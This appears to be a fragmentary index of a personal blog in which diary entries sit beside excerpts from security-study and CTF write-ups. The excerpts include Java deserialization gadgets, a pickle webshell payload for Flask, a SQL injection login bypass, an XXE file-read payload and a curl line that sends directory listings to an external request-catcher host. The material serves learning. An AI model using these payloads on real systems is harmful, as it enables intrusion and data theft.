Leaving Tieba
Great news: my head no longer hurts
Feeling a bit down
Dream
June 8: Dream
Reviewing deserialization: cc1-cc7
URLDNS: hashmap:readObject readObject:putVal putVal:hash hash:URL.hashcode == -1 getHostAddress => DNS lookup
HashMap map = new HashMap();
URL url = new URL("http://dyro20rs.dnslog.pw");
Class clas = Class.forName("java.net.URL");
Field field = clas.getDeclaredField("hashCode");
field.setAccessible(true);
field.set(url,-1);
map.put(url,"2333");
field.set(url,-1);
cc2: during deserialization, the queue's readObject is triggered, which calls heapify() (the heap-sort function); inside heapify(), siftDownUsingCom ...
Fastjson
Fastjson provides two main interfaces, one for serializing Java objects and one for deserializing them: JSON.toJSONString and JSON.parseObject/JSON.parse. An example:
// a simple Java Bean
// use the Alt+Insert shortcut to quickly generate setters and getters
public class Person { public String name; public int age; public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } ...
Hexo customizations
Speechless, man
Untitled
flask
import os
import pickle
import base64
class A():
    def __reduce__(self):
        return (eval,("__import__(\"sys\").modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen(request.args.get('gxngxngxn')).read())",))
a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))
import os
import pickle
import base64
class A():
    def __reduce__(self):
        return (eval,("__import__(& ...
login system
A very interesting challenge. The official PoC; before running the PoC, install pycurl first:
export LDFLAGS="-L/opt/homebrew/opt/openssl/lib"
export CPPFLAGS="-I/opt/homebrew/opt/openssl/include"
env PYCURL_CURL_CONFIG=/opt/homebrew/bin/curl-config pip install pycurl --no-cache-dir
import requests
import socket
import pycurl
import os
import json
from io import BytesIO
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("target", nargs="?", default="http://localhost:10150/")
parser.add ...
Forgot the password
sql
import requests
url = "https://whats-my-password-web.chal.irisc.tf/api/login"
data = {"username":"skar","password":"\" OR (username = \"skat\" AND password LIKE \"%\") OR \""}
response = requests.post(url, json=data)
print(response.text + "\n" + str(response.status_code))
Close the quote early and it works; % acts as the wildcard.
LameNote
Fine, fine, I can't read Node.js, I hate it. Bookmarking a good site: Request Catcher — record HTTP requests, webhooks, API calls
curl -X POST -d "$(ls /tmp)" https://asddsa.requestcatcher.com/test
Just Go Around
One query, one post, one accept. Under the third route there is an XML external entity injection, fuck me.
%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%20standalone%3d%22no%22%3f%3e%3c!DOCTYPE%20post%20%5b%3c!ENTITY%20hacker%20SYSTEM%20%22file%3a%2f%2f%2f%22%3e%5d%3e%3cpost%20author%3d%22CTF%20Participant%22%20id%3d%220%22%20title%3d%22234%22%3e%3cmessage%3e%26hacker%3b%3c%2fmessage%3e%3c%2fpost%3e
that is,
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE post [<!ENTITY hacker SYSTEM "f ...
easy-java
No way, he said "easy" and you actually believed it?
dionysus
I am drunk and wish to sleep; you may go
Where this heart is at peace